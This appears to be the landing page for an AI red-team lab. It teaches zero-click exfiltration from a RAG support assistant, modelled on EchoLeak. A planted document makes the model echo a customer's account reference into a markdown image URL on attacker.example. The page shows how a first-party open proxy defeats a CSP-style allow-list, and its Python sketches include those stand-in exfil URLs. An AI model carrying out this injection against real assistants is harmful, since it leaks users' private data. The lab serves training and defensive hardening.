Insecure Output Handling: Zero-Click Exfiltration Through Rendered Model Output (EchoLeak)

Treat the model as an untrusted source whose output flows into a sink: the chat client's markdown renderer. Prove the renderer auto-fetches, then plant a document so that a benign account question makes the assistant echo a customer's own account reference into a markdown image URL, and watch the renderer auto-fetch it (zero-click exfil, the EchoLeak channel). Measure the attack-success rate (ASR) of that exfil, defeat a CSP-style allow-list through a first-party open proxy, and measure that bypass too. Then harden in two moves: close the render sink so untrusted output never fires an outbound request, and add an audited host allow-list the open proxy cannot defeat. Finally, re-run both attacks to watch ASR fall to zero.

85 min · 8 steps · 3 domains · Advanced

[Diagram: Map the attack surface. Components: Query, Retriever, LLM, Answer, with a poisoned doc arriving as a retrieved chunk. Scoreboard: 0% attack-success rate; attacks blocked, benign answers pass; graded on real output, not the model's talk.]

What you'll learn

1. Recon: prove the renderer auto-fetches
You are red-teaming DV-RAG-Support, ACME Cloud's customer-support assistant. A...

2. Pixel exfil: zero-click leak through the renderer
Now turn the renderer into an exfil channel. The model is never asked to leak a...

3. Measure: attack-success-rate of the pixel exfil
One lucky exfil is a demo. A finding needs an attack-success-rate (ASR): how often...

4. CSP bypass: defeat the allow-list through a first-party open proxy
The blue team shipped a CSP-style fix: the renderer now trusts exactly one image...

5. Measure: attack-success-rate of the CSP bypass
You proved the open-proxy bypass works once. A finding needs the same treatment the...

6. Harden the sink: no outbound on untrusted output
Switch hats. You proved the direct-pixel exfil, measured it, bypassed a CSP-style...

7. Harden the allow-list: an audited host list the open proxy cannot defeat
The sink no longer fetches attacker query params, so both exploits are dead today. But...

8. Verify: re-run both attacks, ASR drops to zero
A fix you did not re-measure is a hope. You measured two attacks earlier: the...
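
The measurement steps above boil down to counting how often a rendered answer would actually send the account reference to the attacker. The following is a minimal sketch of that calculation, not the lab's grader: the host `attacker.example`, the reference `ACME-REF-0001`, the sample answers, and the function names are all hypothetical, and the image regex is a simplification of real markdown parsing.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hypothetical values, chosen only for illustration.
ATTACKER_HOST = "attacker.example"
ACCOUNT_REF = "ACME-REF-0001"

# Simplified matcher for markdown images: ![alt](url ...)
IMAGE_URL = re.compile(r"!\[[^\]]*\]\(([^)\s]+)")

def is_exfil(answer: str) -> bool:
    """True if rendering `answer` would send ACCOUNT_REF to ATTACKER_HOST."""
    for url in IMAGE_URL.findall(answer):
        parsed = urlparse(url)
        if parsed.hostname != ATTACKER_HOST:
            continue
        values = [v for vs in parse_qs(parsed.query).values() for v in vs]
        if ACCOUNT_REF in values:
            return True
    return False

def attack_success_rate(answers: list[str]) -> float:
    """Fraction of trials in which the exfil actually fired."""
    if not answers:
        raise ValueError("need at least one trial")
    return sum(is_exfil(a) for a in answers) / len(answers)

# Four made-up trials: two leak, two do not.
answers = [
    "Your plan renews monthly. ![status](https://attacker.example/p.png?ref=ACME-REF-0001)",
    "Your plan renews monthly.",
    "See billing. ![s](https://attacker.example/p.png?ref=ACME-REF-0001)",
    "I can't help with that.",
]
print(attack_success_rate(answers))  # 0.5
```

Grading on the URL the renderer would fetch, rather than on what the model says it did, matches the idea of scoring real output.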

Prerequisites

Comfortable reading Python
Know what an HTTP GET and a markdown image are
No ML background required

Exam domains covered

Offensive AI Security · LLM Application Security · Data Exfiltration

Skills & technologies you'll practice

This advanced-level AI/ML lab gives you real-world reps across:

Insecure Output Handling · EchoLeak · Data Exfiltration · RAG · Markdown Rendering · OWASP LLM05 · Offensive Security · AI Red Team

What you'll do in this lab

This is a hands-on offensive-security lab about insecure output handling (OWASP LLM05). You attack DV-RAG-Support, a working Retrieval-Augmented Generation (RAG) assistant, by treating its output as somebody else's input. The chat client renders the model's answer as markdown, and rendering a markdown image triggers an outbound HTTP request. You plant one help article so that a customer's ordinary account question makes the assistant echo the customer's own account reference into an image URL, which the renderer then auto-fetches. The record is exfiltrated with zero clicks, over the same channel behind EchoLeak, widely reported as the first real-world zero-click exploit against a production LLM system.
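
To make the "rendering is a request" point concrete, here is a toy renderer, assuming a client that eagerly loads every image it encounters. It is an illustration rather than DV-RAG-Support's actual client: `render`, the injected `fetch` callback, the host `attacker.example`, and the reference `ACME-REF-0001` are hypothetical, and the regex covers only the simplest image syntax.

```python
import re
from html import escape
from typing import Callable

# Simplified matcher for markdown images: ![alt](url)
IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")

def render(markdown: str, fetch: Callable[[str], None]) -> str:
    """Toy renderer: converts images to <img> tags and fetches each URL
    immediately, the way an auto-loading chat client would."""
    def to_img(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        fetch(url)  # the outbound GET happens here, with no user click
        return f'<img alt="{escape(alt)}" src="{escape(url)}">'
    return IMAGE.sub(to_img, markdown)

# Record "requests" in a list instead of touching the network.
requests_seen: list[str] = []
answer = "Your invoice is ready. ![ok](https://attacker.example/p.png?ref=ACME-REF-0001)"
rendered = render(answer, requests_seen.append)

print(requests_seen)
# ['https://attacker.example/p.png?ref=ACME-REF-0001']
```

The customer only asked a question and read the answer; the account reference left in the query string of a request the renderer made on its own.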

You then defeat a CSP-style allow-list the way EchoLeak's authors did: by routing the exfil through a first-party open proxy that the allow-list trusts, which proves that an allow-list is only as strong as its most open member. You measure how reliably the channel fires across realistic account questions, then switch hats and fix the problem at the sink: an audited egress allow-list that refuses open-proxy members, a renderer that never forwards attacker query parameters, and a safe-markdown subset that drops raw HTML and dangerous URI schemes. The lesson is that the bug was never that the model said something bad; it was that the app passed model output to an interpreter unsanitized.
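
The bypass and the allow-list fix can be sketched in a few lines. This is one possible reading of "audited" under stated assumptions, not the lab's reference solution: the hosts `static.acme.example` and `img.acme.example`, the `/proxy?url=` endpoint, and the helper names are hypothetical, and the audit result (which hosts forward requests) is hard-coded rather than discovered.

```python
from urllib.parse import urlparse, urlunparse

# Hypothetical first-party hosts. The value is True when the host forwards
# requests to a caller-supplied URL, i.e. behaves as an open proxy.
CANDIDATE_HOSTS = {
    "static.acme.example": False,
    "img.acme.example": True,
}
NAIVE_ALLOW_LIST = set(CANDIDATE_HOSTS)
AUDITED_ALLOW_LIST = {h for h, is_proxy in CANDIDATE_HOSTS.items() if not is_proxy}

def allows(url: str, allow_list: set[str]) -> bool:
    """Host-based check in the style of a CSP img-src allow-list."""
    parts = urlparse(url)
    return parts.scheme == "https" and parts.hostname in allow_list

def strip_query(url: str) -> str:
    """Drop params, query and fragment so no attacker data rides along."""
    parts = urlparse(url)
    return urlunparse(parts._replace(params="", query="", fragment=""))

direct = "https://attacker.example/p.png?ref=ACME-REF-0001"
bypass = ("https://img.acme.example/proxy?url="
          "https%3A%2F%2Fattacker.example%2Fp.png%3Fref%3DACME-REF-0001")

print(allows(direct, NAIVE_ALLOW_LIST))    # False: attacker host is blocked
print(allows(bypass, NAIVE_ALLOW_LIST))    # True: trusted host relays the leak
print(allows(bypass, AUDITED_ALLOW_LIST))  # False: open proxy was removed
print(strip_query("https://static.acme.example/logo.png?ref=ACME-REF-0001"))
# https://static.acme.example/logo.png
```

The two controls are independent on purpose: removing open-proxy members closes today's relay, and stripping query strings means a relay added to the list later still has nothing to carry.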

Frequently asked questions

Do I need to know machine learning to do this lab?

No. You need to read Python and understand a basic HTTP request and a markdown image. The lab is about how an application trusts and renders model output, not about model internals. Everything model-specific is explained inline.

What is insecure output handling?

It is the class of bug where an application passes model output to an interpreter (a browser, a shell, a SQL engine, an HTTP client) without sanitizing it. Here the interpreter is the chat client's markdown renderer, and a model-emitted image URL becomes an attacker-controlled outbound request. It is OWASP LLM05:2025, Improper Output Handling.
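
As a rough illustration of sanitizing before the interpreter sees the output, the sketch below reduces untrusted markdown to a safer subset: raw HTML is made inert, images collapse to their alt text so nothing is fetched, and links with non-HTTP schemes lose their target. The function name `sanitize`, the regexes, and the scheme list are assumptions for illustration; a production filter would work on a parsed markdown tree rather than regexes.

```python
import re
from urllib.parse import urlparse

# Simplified matchers; real markdown has more forms than these cover.
IMAGE = re.compile(r"!\[([^\]]*)\]\([^)]*\)")
LINK = re.compile(r"\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
SAFE_SCHEMES = {"http", "https"}  # assumed policy

def sanitize(markdown: str) -> str:
    """Reduce untrusted model output to a safer markdown subset."""
    # 1. Make raw HTML inert by escaping the tag opener.
    text = markdown.replace("<", "&lt;")
    # 2. Replace every image with its alt text: no URL, no fetch.
    text = IMAGE.sub(lambda m: m.group(1), text)
    # 3. Keep links only when the scheme is on the safe list.
    def keep_or_drop(match: re.Match) -> str:
        label, url = match.group(1), match.group(2)
        if urlparse(url).scheme.lower() in SAFE_SCHEMES:
            return match.group(0)
        return label
    return LINK.sub(keep_or_drop, text)

print(sanitize("Hi ![ok](https://attacker.example/p.png?ref=ACME-REF-0001)"))
# Hi ok
print(sanitize("[click](javascript:void0)"))
# click
print(sanitize("[docs](https://acme.example/help)"))
# [docs](https://acme.example/help)
```

Ordinary links survive, so benign answers still render usefully while the auto-fetching element is removed.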

Is this how the EchoLeak Copilot attack worked?

Yes, in miniature. EchoLeak (CVE-2025-32711, CVSS 9.3) made Microsoft 365 Copilot encode a user's own data into a markdown image URL that the client auto-loaded, exfiltrating the data with no user interaction, and its CSP allow-list was bypassed through a first-party open proxy. This lab reproduces that render-sink channel and that allow-list bypass against a small RAG assistant you can read end to end.